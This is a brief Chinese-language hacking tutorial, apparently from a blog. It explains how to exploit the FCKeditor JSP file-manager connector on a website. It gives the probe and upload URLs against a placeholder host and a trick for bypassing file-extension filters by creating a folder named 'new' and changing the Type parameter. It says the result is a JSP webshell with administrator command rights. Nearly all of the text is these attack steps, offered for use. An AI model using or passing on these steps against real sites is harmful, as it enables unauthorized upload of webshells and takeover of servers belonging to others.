http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
用這個位址查找上傳圖檔的路徑,存在漏洞的話應該傳回一個xml檔案,如圖
注意紅框的地方,是上傳後圖檔存放的位址。
然後用
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
這個位址上傳jsp檔案,如果網站對上傳檔案的字尾作了限制,那麼就建立一個名字為new的檔案夾,修改上面url中的Type=Image為Type=new,把檔案上傳到這個檔案夾,這個檔案夾一般就不會對檔案字尾作限制了。如圖:
如果一切正常的話,利用這個Fckeditor 的漏洞所獲得的jsp webshell應該有cmd管理者權限